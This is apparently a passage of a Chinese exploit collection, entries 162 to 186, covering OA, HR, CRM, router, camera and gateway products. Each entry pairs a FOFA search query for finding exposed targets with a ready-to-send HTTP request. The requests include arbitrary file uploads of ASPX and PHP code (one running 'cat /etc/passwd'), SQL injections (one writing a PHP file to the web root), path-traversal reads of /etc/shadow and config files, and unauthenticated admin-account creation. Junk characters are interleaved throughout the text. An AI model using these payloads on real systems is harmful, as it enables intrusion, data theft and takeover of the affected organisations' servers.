1 S) Z2 Q% Y0 m162. 和丰多媒体信息发布系统 QH.aspx 任意文件上传
k8 @6 C/ l1 _5 X/ o! F" sFOFA: app="和丰山海-数字标牌"
; M' o; s. c6 F, D+ x5 fPOST /QH.aspx HTTP/1.1
1 v2 t5 C, V* K" Z# b* NHost: x.x.x.x+ v, l. i( g2 J. S4 Q' P2 w% v
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
+ l4 K4 k8 n5 H' Y" ^Connection: close
: I) ?1 l3 m* ?2 d8 TContent-Length: 583: b' Y4 u& }! M6 U
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryeegvclmyurlotuey& J, J+ t* Q4 m7 u
Accept-Encoding: gzip
2 \, r- k; D! |# D" C+ g, E
3 [, q: h# L4 ]4 V- R, A------WebKitFormBoundaryeegvclmyurlotuey$ Z4 _( @+ c5 ~1 L. i
Content-Disposition: form-data; name="fileToUpload"; filename="kjuhitjgk.aspx"' k/ y r+ \0 o: P- W" D6 r4 E
Content-Type: application/octet-stream
, f9 ~! w7 \9 Y/ \+ }+ [9 m
9 `* ?6 ]1 ~$ }0 g3 D0 b' T* T3 _5 s<% response.write("ujidwqfuuqjalgkvrpqy") %>
8 l0 b' k# r- i------WebKitFormBoundaryeegvclmyurlotuey! z: j9 Z! U5 m
Content-Disposition: form-data; name="action"# E) A; P- t! U1 Q3 O
$ Y7 m2 T, `7 ^/ C4 q
upload5 J2 T$ v1 s B/ b& p/ ]
------WebKitFormBoundaryeegvclmyurlotuey9 d: m6 E' ]/ [ Z
Content-Disposition: form-data; name="responderId"
& b2 b& U; c# C. k5 ^- ]% a
, g; D3 A2 T$ k8 S4 OResourceNewResponder
& s. t1 B6 G- Y$ Q; E; P+ |" c------WebKitFormBoundaryeegvclmyurlotuey) p& b" W& V: Y' K2 m: _0 m# G0 J
Content-Disposition: form-data; name="remotePath"
: O+ t6 s( n6 d* G' A3 z9 j" l
. b" ^& e7 [: ~$ V! e( y/opt/resources
/ U& J" B- G, B3 }------WebKitFormBoundaryeegvclmyurlotuey--
! `7 {- d2 f: B, p& [3 [" \/ _( u1 S% ~5 r8 Q; u
! c3 `! A8 J0 O4 V/ i' l
http://x.x.x.x/opt/resources/kjuhitjgk.aspx
$ A4 n$ d2 ~- L
4 Y% ~0 N! L& L2 Z. w( w: S b163. 号卡极团分销管理系统 ue_serve.php 任意文件上传4 d* |4 T/ I0 z- D0 f
FOFA: icon_hash="-795291075"4 s$ C3 o7 X3 ?. }9 o" h
POST /admin/controller/ue_serve.php?action=image&encode=utf-8 HTTP/1.1
# b D9 D; j" `# a. N+ W+ f/ OHost: x.x.x.x
% Y" N3 M: }& W9 n$ JUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
0 g" j8 o3 a+ k- ^' x, uConnection: close
( `0 A5 }' _& X7 H, w! A6 RContent-Length: 293
& F1 a$ J( v. |* w8 B' CAccept: */*
8 ]8 c7 E* l5 V) S OAccept-Encoding: gzip, deflate& k( I6 v4 R& |1 D1 [9 n6 j. R
Accept-Language: zh-CN,zh;q=0.9+ h/ T5 S5 b v2 I5 h
Content-Type: multipart/form-data; boundary=----iiqvnofupvhdyrcoqyuujyetjvqgocod+ b$ y( P6 O- R) `' ]
5 ? I/ n2 r$ q------iiqvnofupvhdyrcoqyuujyetjvqgocod
% y- p" W6 D r1 K' Q* O1 ?Content-Disposition: form-data; name="name"# G; B0 L' N$ e- c# r! F: Q
( N9 G, s0 x6 k. D4 q+ t/ G
1.php
3 G6 l6 |. O# Z; Y0 p% }" _* N------iiqvnofupvhdyrcoqyuujyetjvqgocod
& u" @: h' d1 z) I1 ~9 S/ oContent-Disposition: form-data; name="upfile"; filename="1.php"* R! {$ K3 \5 M% Q8 _0 l
Content-Type: image/jpeg
7 V+ G" V! A; r; @+ G. C9 d) \) o: w u- w: o
rvjhvbhwwuooyiioxega. ^1 C) O3 D3 \% L3 N P
------iiqvnofupvhdyrcoqyuujyetjvqgocod--$ I6 B( L: a" G8 p6 i, P
" M }. @; u9 i, o5 O0 E1 n% _$ k6 R6 H8 u6 q
164. 慧校园(安校易)管理系统 FileUpProductupdate.aspx 任意文件上传
8 F0 t2 V: `8 a; K9 W8 Y& E0 zFOFA: title="智慧综合管理平台登入"
3 M, ]/ E% \& ^$ k5 m( E2 O. ~POST /Module/FileUpPage/FileUpProductupdate.aspx HTTP/1.1* p8 ]/ |( p8 @- X2 K- [- e- _( l
Host: x.x.x.x
8 g9 d2 \6 `! Y9 r: lUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0, P& M: `' g5 A
Content-Length: 288+ |+ D, {. \) ~. E5 Y* V
Accept: application/json, text/javascript, */*; q=0.01% @! w1 u) J. P9 |& L
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2,) Q. h0 ~; t1 i5 _, v
Connection: close/ T$ _& d: p' G
Content-Type: multipart/form-data; boundary=----dqdaieopnozbkapjacdbdthlvtlyl! V) O, C- C! H/ A6 ~- f
X-Requested-With: XMLHttpRequest7 f0 e N5 F3 J# A% i1 e7 [$ {
Accept-Encoding: gzip
3 u" c; U1 d0 S7 I; }) h8 D5 Z! s5 U. I" |1 a0 }
------dqdaieopnozbkapjacdbdthlvtlyl
" }9 y' x+ S) B( ?8 P oContent-Disposition: form-data; name="Filedata"; filename="qaz.aspx". {7 B! t1 H9 g6 H' C) J( \% r( l
Content-Type: image/jpeg. r, A$ {6 \0 r2 r8 Y4 Q+ i6 [
0 ^+ [$ f$ o# b6 E<%@Page Language="C#"%><%Response.Write("aitwpovoxwtgixpfqiys");System.IO.File.Delete(Request.PhysicalPath);%>
" i! T$ c% g2 `------dqdaieopnozbkapjacdbdthlvtlyl--/ c3 M Q/ I6 D& J* r/ n
: [) z3 ^" z* @) B* w X
6 e0 g: c0 e h7 l7 g7 Vhttp://x.x.x.x/Upload/Publish/000000/0_0_0_0/update.aspx; d) T1 k/ \& s8 Y& H
' K9 `' J. I9 _" U+ x& F165. OrangeHRM 3.3.3 SQL 注入5 W2 g% A" d, x5 Q2 C$ A& F& T3 u
CVE-2024-36428
. O5 S5 ?# B3 ^! i* I1 u' R$ UFOFA: app="OrangeHRM-产品"
" R8 b1 w; y8 OURL:https://192.168.1.28/symfony/web ... e&sortOrder=ASC,(SELECT (CASE WHEN (5240=5240) THEN 1 ELSE 5240*(SELECT 5240 FROM INFORMATION_SCHEMA.PLUGINS) END))
2 f7 ]5 }2 ?% e
" c0 v/ |) C" a- ?6 ]* }. }
% Q4 ~+ `" T8 Z! A5 x166. 中成科信票务管理平台SeatMapHandler SQL注入: @0 o3 G ^: u$ d; h$ x4 V
FOFA:body="技术支持:北京中成科信科技发展有限公司"
/ t0 y0 Q( C5 vPOST /SystemManager/Comm/SeatMapHandler.ashx HTTP/1.1
j: y1 [5 v+ @0 {4 }Host:# \/ ]: l0 n" I- o
Pragma: no-cache
7 Z7 \* X, k% V5 TCache-Control: no-cache
/ Z3 e$ L' Y/ RUpgrade-Insecure-Requests: 1
# w. O2 T' l* F$ ?& x7 ^+ B* E# P& YUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
- K: H9 c2 E% V. YAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.78 v/ x2 q m6 f( I2 q% y# I
Accept-Encoding: gzip, deflate
1 S) T7 h3 a8 u7 F' mAccept-Language: zh-CN,zh;q=0.9,en;q=0.8
) V5 e; b0 z. R) T3 n9 CCookie: ASPSESSIONIDCCRBRCTD=LHLBDIBAKDEGBCJGKIKMNODE
" N- X9 l0 |# S7 M" t: uConnection: close5 D g# t: K0 g7 h
Content-Type: application/x-www-form-urlencoded
7 K6 {( S4 N# A( G |Content-Length: 89! D( g$ v; _9 c. I5 Y
0 s6 q5 m3 r, F" O; N
Method=GetZoneInfo&solutionNo=%27+AND+4172+IN+%28SELECT+%28CHAR%28104%29%2BCHAR%28101%29%2BCHAR%28108%29%2BCHAR%28108%29%2BCHAR%28111%29%29%29--+bErE
# j. I) w2 r: b+ b5 x/ a' ]
" a! p8 \+ N( a6 h+ T$ K* f- ~6 E0 b2 ]) i. u5 T
167. 精益价值管理系统 DownLoad.aspx任意文件读取% V( G& A" e, I- a/ c. O) D
FOFA:body="/ajax/LVS.Core.Common.STSResult,LVS.Core.Common.ashx"4 W$ T) \% W! j3 y2 t
GET /Business/DownLoad.aspx?p=UploadFile/../Web.Config HTTP/1.1- x$ H/ C1 }8 _/ N( o* o
Host:
6 T- Z9 h! Y# N% |4 [User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36% `3 k7 q- y4 n% F& W% J
Content-Type: application/x-www-form-urlencoded/ w7 d, I* k Q M2 T" w* c. p+ x4 S
Accept-Encoding: gzip, deflate
- ~/ e# r) A# u5 b {Accept: */*
9 |( c2 a; _# @( }. i+ q6 jConnection: keep-alive: E2 a0 A& I3 P! w: B, S2 G
6 i5 V6 }6 s3 K# [0 _- Z8 P
% @5 y* S1 I* x# y, z) j; f7 B) I168. 宏景EHR OutputCode 任意文件读取
+ x9 {1 O) E( J0 v8 G p- B, G9 eFOFA:app="HJSOFT-HCM"3 [4 x5 F2 X# U( e4 ?
GET /servlet/OutputCode?path=VHmj0PAATTP2HJBPAATTPcyRcHb6hPAATTP2HJFPAATTP59XObqwUZaPAATTP2HJBPAATTP6EvXjT HTTP/1.1
1 ]2 [' \# J- `3 F NHost: your-ip& I# \7 @) {4 o2 b, M( }. z
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.369 i7 `3 M) W# Z9 B7 B" P/ s
Content-Type: application/x-www-form-urlencoded0 ^! A2 Y5 X$ t
Connection: close
2 b1 n j+ R9 _: s9 o1 I
- ^& ~/ i: S% g) a( h8 d5 B5 b5 B `
0 o4 U8 g8 }8 x: T+ k( i169. 宏景EHR downlawbase SQL注入
4 a) V. r b( H8 yFOFA:app="HJSOFT-HCM"
w5 G3 e, \. X" o! S/ Y- M9 u+ f+ \) {GET /templates/attestation/../../selfservice/lawbase/downlawbase?id=1';WAITFOR+DELAY+'0:0:5'--+ HTTP/1.1/ n" q7 {$ t& k7 a5 \+ ~ {+ }# ~
Host: your-ip
% o! a, K: L2 h! A/ sUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.365 |4 E$ ^* F) T* X# |/ t+ x
Accept: */*# A# S# h3 ~& r
Accept-Encoding: gzip, deflate! V# `/ }4 q* }8 h5 L( r6 y, m
Connection: close
# y% T7 }3 v9 L; }5 {) t+ W8 \' M/ d0 U
! z' }6 I9 L; B2 Y
+ s+ T. e& V; M! W# @3 z: z170. 宏景EHR DisplayExcelCustomReport 任意文件读取" q" m6 W, M: P5 T
FOFA:body="/general/sys/hjaxmanage.js"
* v9 o! y. O& @1 H5 d5 MPOST /templates/attestation/../../servlet/DisplayExcelCustomReport HTTP/1.1
. o8 g `( B! e! THost: balalanengliang: X3 D/ v# Q; Z. V0 c/ A
User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
/ B/ P% s# w# b! T1 W8 UContent-Type: application/x-www-form-urlencoded/ \# L3 u) H% m6 @- {& i, I2 d
! |' H1 U, H6 F9 L! }' c1 l: ^filename=../webapps/ROOT/WEB-INF/web.xml" h; D. K) G: ~" x `+ c
6 u! Z/ w# [- p/ y: ^( o5 n
* r# Y+ C4 O4 k, }171. 通天星CMSV6车载定位监控平台 SQL注入0 l) c. \" K8 y' \. [; t7 k
FOFA:body="/808gps/"; v$ |. \) B2 F5 I( B" M% l! x
GET /run_stop/delete.do;downloadLogger.action?ids=1)+AND+(SELECT+5394+FROM+(SELECT(SLEEP(5)))tdpw)--+&loadAll=1 HTTP/1.1% w. s* c. K X9 T
Host: your-ip
" f% T# _ Y* |; p: a8 f( RUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
& D6 n6 z' Z! r: @2 ^3 Q3 kAccept: */*
* b' o6 F8 J$ r8 P, m0 cAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
# X- \) d$ S! d# g6 @4 VAccept-Encoding: gzip, deflate
7 }# ~, o/ x! u2 G8 w' JConnection: close
' X& o( w4 U5 D0 H( ]# K
9 ?; ^4 U6 B6 l7 N5 p9 ~" d
P( {( H' Y9 K# i5 } O7 V+ Q1 {; Y8 \0 ]: d; ^
172. DT-高清车牌识别摄像机任意文件读取
4 e* d R- P; b3 `' M5 @FOFA:app="DT-高清车牌识别摄像机"0 K' T0 M. [! h- x5 f8 R. T) Y
GET /../../../../etc/passwd HTTP/1.1
7 u4 s, i F' V! ]' }6 vHost: your-ip; t% [+ p. r( F
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36# e6 E8 h) R8 o# M4 N( j% h. w$ k
Accept-Encoding: gzip, deflate+ m" z5 D$ j. ^) e% L9 c; r1 \6 s
Accept: */*( a4 k) ?$ J' G h" b& x( n
Connection: keep-alive( P' m2 O/ G; k* J
/ B3 j/ k% ]$ k, v$ {) |* m9 O
- q4 V# K9 [# t3 V0 s1 l+ @7 I: ^9 p6 K: k2 M* M1 }
173. Check Point 安全网关任意文件读取" c! ] ^6 x! L8 p
CVE-2024-24919
0 n: @0 ^, U$ O/ C2 I& ~8 iFOFA:app="Check_Point-SSL-Network-Extender"4 Z+ @2 x3 X8 c6 y7 e
POST /clients/MyCRL HTTP/1.1- f$ w& U. E6 e
Host: your-ip; L% [( p5 w- M. l# r1 a. M" w; K
Content-Type: application/x-www-form-urlencoded* H, P6 \5 a1 a+ K4 D! O
, b, }5 \. ~, F& Z0 D1 B0 }
aCSHELL/../../../../../../../etc/shadow
! f, \# T8 n/ g$ W; a5 v9 r9 S7 p
# R. C$ D- `2 M- z8 {# D) u
! a8 X8 X" c+ [( y174. 金和OA C6 FileDownLoad.aspx 任意文件读取. F+ D9 E" ?' C1 g
FOFA:app="金和网络-金和OA"
$ |! d& c& M1 S4 d- X7 }& _! oGET /c6/JHSoft.Web.CustomQuery/FileDownLoad.aspx?FilePath=../Resource/JHFileConfig.ini HTTP/1.1
8 K; _. n# g1 u7 A+ ?Host: your-ip( n$ h7 @5 z* t0 P) D/ z1 |# M5 }
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
0 u8 o* O) A8 @ HAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7; N3 ~! H4 W( ]+ f m, ^, |' n
Accept-Encoding: gzip, deflate, br
" T9 ?" J% n6 z3 F# lAccept-Language: zh-CN,zh;q=0.9
/ n; f9 |8 r% g% E) ?1 ^Connection: close! ]- \& e7 u6 r$ C: A2 z
5 \$ x) I2 B, Z# \9 s# d9 S1 H: [# z" r
! [6 o+ W2 B ]# M' t: U
175. 金和OA C6 IncentivePlanFulfill.aspx SQL注入
9 V$ [2 T3 _. i4 a& X; |; ^FOFA:app="金和网络-金和OA". d" E7 ? s- C
GET /C6/JHSoft.Web.IncentivePlan/IncentivePlanFulfill.aspx/?IncentiveID=1%20WAITFOR%20DELAY%20'0:0:5'--&TVersion=1 HTTP/1.1
+ ^7 W$ {- W, W% P7 b, v; GHost:
# ~6 [. ~) m# t4 `5 Y# f' NUser-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
) R+ z9 M( z5 T/ MAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
& L9 G9 w$ g, o. K, gAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2$ J! _8 c& t! `* h* P& t/ c
Accept-Encoding: gzip, deflate2 r7 o( d4 j6 `: C
Connection: close
, @6 u X, {2 V: H( O: P! [/ o9 \! AUpgrade-Insecure-Requests: 1
8 Q, ~) A6 E2 P) ~% U
+ F$ p" G3 D3 I( b; K! g& B/ U& i/ h
176. 电信网关配置管理系统 rewrite.php 文件上传! d8 y+ v/ ?) z7 Q
FOFA:body="img/login_bg3.png" && body="系统登录"
& m5 L4 n2 E. o% PPOST /manager/teletext/material/rewrite.php HTTP/1.1
9 o& T$ K) C; A, AHost: your-ip& V* T# {1 Y7 g: i
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.08 w' a. `5 g( ~
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryOKldnDPT
" H+ A, }, j; s* T$ c3 ]! i, YConnection: close+ }. X2 q# {' z0 v7 G
7 ~& S; v0 V7 r+ @' p C: g------WebKitFormBoundaryOKldnDPT! p3 }5 D7 P! w$ A
Content-Disposition: form-data; name="tmp_name"; filename="test.php"
- n; H& N' Q5 y$ f- Z9 M+ ]8 zContent-Type: image/png
y- h; x, g' j3 w! O
3 B! q1 U; Y7 ~# A8 A1 y<?php system("cat /etc/passwd");unlink(__FILE__);?>0 l% j* g7 f; @
------WebKitFormBoundaryOKldnDPT
- A j/ a( J0 ]! ^. }1 `Content-Disposition: form-data; name="uploadtime"
5 `: @' E' O, C# d0 Y ; g6 }3 n" {# Z8 [' ?. w' W% w. \
# {4 g1 j) g# G" R0 U7 |) j# N
------WebKitFormBoundaryOKldnDPT--. v2 a Z1 c I7 R. Z8 _
0 B ?' W( S( S' S* D7 H1 `9 Y; l# T! w" K5 b0 p# J) l
, }' V$ Z L8 u+ P& x2 I% [ d# C! z177. H3C路由器敏感信息泄露. o0 o( w+ j( [) b; q( @
/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg
9 g* |; y5 l- k1 `/userLogin.asp/../actionpolicy_status/../M60.cfg6 f4 U0 |' i2 ~- M# j( H
/userLogin.asp/../actionpolicy_status/../GR8300.cfg
& @$ p2 A+ @4 q% _3 {4 k9 ?6 p9 c/userLogin.asp/../actionpolicy_status/../GR5200.cfg, `9 A& u2 R/ A
/userLogin.asp/../actionpolicy_status/../GR3200.cfg( w* h/ T# L! A3 k/ K, d
/userLogin.asp/../actionpolicy_status/../GR2200.cfg
% Y! V R% d' J" e/ W( X/userLogin.asp/../actionpolicy_status/../ER8300G2-X.cfg
% }/ q& _7 S+ ]- F$ p% t/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg
1 R: b2 e& o7 o+ k$ u! m/userLogin.asp/../actionpolicy_status/../ER6300G2.cfg$ G3 y9 x7 h9 K: m) E* a' S
/userLogin.asp/../actionpolicy_status/../ER5200G2.cfg( `0 D- B" c$ ]
/userLogin.asp/../actionpolicy_status/../ER5200.cfg; k# W& z) B$ O
/userLogin.asp/../actionpolicy_status/../ER5100.cfg
; E: u6 e0 ^/ r6 T8 d' {* i3 ?/userLogin.asp/../actionpolicy_status/../ER3260G2.cfg
5 U' z6 Y- \- Q' O/userLogin.asp/../actionpolicy_status/../ER3260.cfg+ ]4 j9 z$ F* @3 }0 N
/userLogin.asp/../actionpolicy_status/../ER3200G2.cfg
* p. H6 ?0 C1 s+ H! P/userLogin.asp/../actionpolicy_status/../ER3200.cfg
# Z1 J, a0 L7 w' u! J( q9 D+ ~" I/userLogin.asp/../actionpolicy_status/../ER3108GW.cfg
# K- q- W3 Z( d. y" V8 l! `/userLogin.asp/../actionpolicy_status/../ER3108G.cfg
) ^, \! C0 ^" L' x4 h/userLogin.asp/../actionpolicy_status/../ER3100G2.cfg
1 A2 B) B( s# j& g6 }/userLogin.asp/../actionpolicy_status/../ER3100.cfg1 D" p5 l2 S! C* H2 J5 p1 J
/userLogin.asp/../actionpolicy_status/../ER2200G2.cfg
% L" q4 y4 u* p; {3 J+ z4 w7 d; o, i- w" Z
3 I% E) V9 M# |, l: r* v
178. H3C校园网自助服务系统-flexfileupload-任意文件上传: O3 d8 A" u, E6 S" M8 w$ A
FOFA:header="/selfservice"
& U; u" i. P8 H( w& a. q; VPOST /imc/primepush/%2e%2e/flexFileUpload HTTP/1.14 B3 g+ G/ C6 K
Host:
. n y9 V% L/ r7 O: r4 a) XUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36# d- R/ W; O4 n+ }+ x% Y2 P' V. `
Content-Length: 252
: C1 s3 n2 a6 W5 N+ KAccept-Encoding: gzip, deflate2 @) B5 E7 x4 ~- Z
Connection: close
0 i8 m( q' v, K U4 aContent-Type: multipart/form-data; boundary=---------------aqutkea7vvanpqy3rh2l
h, _/ S7 w8 @-----------------aqutkea7vvanpqy3rh2l3 V* z. N, M$ ?" c
Content-Disposition: form-data; name="12234.txt"; filename="12234"
, j; I- v5 s8 R: s; W" bContent-Type: application/octet-stream
- ^# X$ \+ s; y3 W7 uContent-Length: 255$ E; M% N5 _7 Q! h- W$ e" n! {
6 Y: h1 f; }# e% q
12234
3 i2 h1 n5 l4 o" t; T-----------------aqutkea7vvanpqy3rh2l--9 U( K: `3 H, }) Q
9 P7 D0 r. Q* ]7 [0 m
0 }3 T+ A: I* s/ HGET /imc/primepush/%2e%2e/flex/12234.txt
" x' S# {( d6 O
3 O1 P% `2 o2 z& y) B8 Y7 s! t! X
% V( j' ?% S/ a; g& @! ?' h179. 建文工程管理系统存在任意文件读取
& F5 W3 t) F% o# v# @" w( tPOST /Common/DownLoad2.aspx HTTP/1.1
1 }# q4 m: c4 O! M/ p$ PHost: {{Hostname}}* q0 L. n, P- Y4 X6 ^
Content-Type: application/x-www-form-urlencoded6 ]- y ?9 ^, j+ _8 c
User-Agent: Mozilla/5.03 l: m7 l: g. C# f. C
v+ A1 a( K) `, S a$ Z$ e5 H
path=../log4net.config&Name=
1 S" c3 [7 `/ q! F6 Y3 m0 W$ ?1 J) d* z% \) X. W, a' ^; W7 Y4 ~
/ t" A' g0 ~: i; r, A0 e180. 帮管客 CRM jiliyu SQL注入" T8 G Z# s$ S: R
FOFA:app="帮管客-CRM"
' I4 K9 x; e3 x# X9 YGET /index.php/jiliyu?keyword=1&page=1&pai=id&sou=soufast&timedsc=激励语列表&xu=and%201=(updatexml(1,concat(0x7e,(select%20user()),0x7e),1)) HTTP/1.1
% Y/ Q& D; T+ c1 {5 v+ qHost: your-ip
+ w( V7 }, L( @+ rUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.369 T: s2 _# L& u% ^. a
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
* T& G' m" ^7 b7 EAccept-Encoding: gzip, deflate' k1 w! V+ ~* T& a6 t2 f, A
Accept-Language: zh-CN,zh;q=0.96 O7 D4 I+ V. G1 K
Connection: close j8 M) m6 M" Q& i: f! z
; |3 ?5 i; p: C* W( W2 q3 u: m; b8 U* y; }1 h
181. 润申信息科技企业标准化管理系统 UpdataLogHandler.ashx SQL注入
4 }5 N3 u6 |6 K; hFOFA:"PDCA/js/_publicCom.js"
2 Z% \6 n% X% YPOST /PDCA/ashx/UpdataLogHandler.ashx HTTP/1.1$ |0 T/ B1 R! v
Host: your-ip: c) Q& d7 X8 B0 e0 x* I
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
! e, ?/ c7 ?- Q& B* V3 hAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7' }7 h" {0 ]' [9 Z
Accept-Encoding: gzip, deflate, br1 j, m. t; k" t l& }5 y6 d: I) j
Accept-Language: zh-CN,zh;q=0.9
, q9 r4 s- G) Z5 E% q6 t# B' WConnection: close+ t) S1 M5 d1 g; O) o6 `! P( r
Content-Type: application/x-www-form-urlencoded
$ w8 t5 ]2 \1 \4 F
2 D& H/ C% u/ U6 T$ \) F& T4 ]$ H% Y! ]
action=GetAll&start=' WAITFOR DELAY '0:0:5'--&end=&code=11&type=2&page=1&rows=20
6 F+ v$ g9 G; b6 r: h& {7 d6 B2 w
3 g+ k1 Z+ `9 H6 |) M% B
182. 润申科技企业标准化管理系统AddNewsHandler.ashx 任意用户创建
1 m. K( i' N4 Q F/ nFOFA:"PDCA/js/_publicCom.js"+ J0 b7 L }0 T' e% r
POST /PDCA/ashx/AddNewsHandler.ashx?action=Adduser HTTP/1.1
" L. g8 N( O- Y* iHost: your-ip
6 ^0 R% c) ~; I/ }$ I1 _User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.364 j; a( C9 s4 G) F9 R; D( \
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
9 H% _3 n5 [4 ~# OAccept-Encoding: gzip, deflate, br6 W: A8 ?- r; f6 C" Y
Accept-Language: zh-CN,zh;q=0.9
. O4 V1 m. H' P. T6 t& D" v+ dConnection: close) e! M; `$ D- R. ~
Content-Type: application/x-www-form-urlencoded3 I5 d0 y9 P S# J! b
$ {- A* K) x2 }: `
' Z; q- @9 S. X5 T
username=test1234&pwd=test1234&savedays=14 F8 C6 j- M- C3 f. _( c( U0 x
/ b* o! W+ d y' _. F" _% J/ \" L4 a" R3 v. k8 ^: b
183. 广州图创图书馆集群管理系统 updOpuserPw SQL注入. ~3 E: k& x) x
FOFA:body="interlib/common/" || body="Interlib图书馆集群管理系统" || body="/interlib3/system_index" || body="打开Interlib主界面"9 f1 z& B5 C6 M! C
GET /interlib3/service/sysop/updOpuserPw?loginid=admin11&newpassword=Aa@123456&token=1%27and+ctxsys.drithsx.sn(1,(select%20111111*111111%20from%20dual))=%272 HTTP/1.1
2 s- R, N, O1 p1 @( J6 SHost: your-ip
- l3 s9 ^: S4 AUser-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
9 |% f7 Z8 s @* k: i) V) W8 [Accept-Charset: utf-8% P; R/ k( }$ a4 @
Accept-Encoding: gzip, deflate
2 T3 ]) P6 E* \5 MConnection: close6 }7 X. ~: P2 O, z2 s* r
$ G/ B) d3 w% x; W! N& c5 p3 D
8 f$ t8 ^6 D' a- X! G" }184. 迅饶科技 X2Modbus 网关 AddUser 任意用户添加
$ v" O% J& \& d7 n r( J! `FOFA:server="SunFull-Webs", M7 u5 \0 W3 Y2 r' z# V9 m
POST /soap/AddUser HTTP/1.1
5 O/ }' J' J! b6 o8 `' Z& C8 xHost: your-ip+ v4 c- W3 h" b' n% n* @
Accept-Encoding: gzip, deflate6 o8 I& a$ `4 P, M0 U! g
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0% T& Y1 m. l$ `) k- N
Accept: application/xml, text/xml, */*; q=0.01" {8 o" e1 _2 W2 F: o
Content-Type: text/xml; charset=utf-8, J$ W& c& s& y6 y( t' ~
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2+ S6 a1 L4 |% O" R6 y% W) F
X-Requested-With: XMLHttpRequest
! D F& z" B8 s: ~+ ~ Z
2 ` u9 ^: m- R. s. A+ h) V7 l+ P0 K8 k0 W6 R
insert into userid (USERNAME,PASSWORD,PURVIEW,LOGINDATE,LOGINTIME) values('root','123456','4','2024-5-6','11:7:56')# v1 z; M7 {( K t
# W; p- r% _0 f* a% V& Y& {2 P5 q) d( [* J5 s1 m* D; x
185. 瑞友天翼应用虚拟化系统SQL注入1 |& r2 |8 ?2 x
version < 7.0.5.1
8 W, N& {" i# hFOFA:app="REALOR-天翼应用虚拟化系统"* v4 l5 Z1 I1 H8 r! A8 q" e" P
GET /index.php?s=/Admin/appsave&appid=3%27%29%3Bselect+unhex%28%273c3f706870206563686f206d643528223122293b202466696c65203d205f5f46494c455f5f3b20756e6c696e6b282466696c65293b%27%29+into+outfile+%27.%5C%5C..%5C%5C..%5C%5CWebRoot%5C%5Cplom.xgi%27%23 HTTP/1.1: Q, I, R" Z+ E9 u' Y/ w+ B5 [& g1 ~
Host: host; Y' v7 T( {+ y7 a6 E4 W( E! S3 H
: I0 \0 D, z/ Z* P( L; p
' i. d# h# V, e2 Y186. F-logic DataCube3 SQL注入
! F3 L+ t9 s; @( t. Y7 ICVE-2024-31750" B) T: g ^/ }) V) L W; c+ \6 ^
F-logic DataCube3是一款用于光伏发电系统的紧凑型终端测量系统
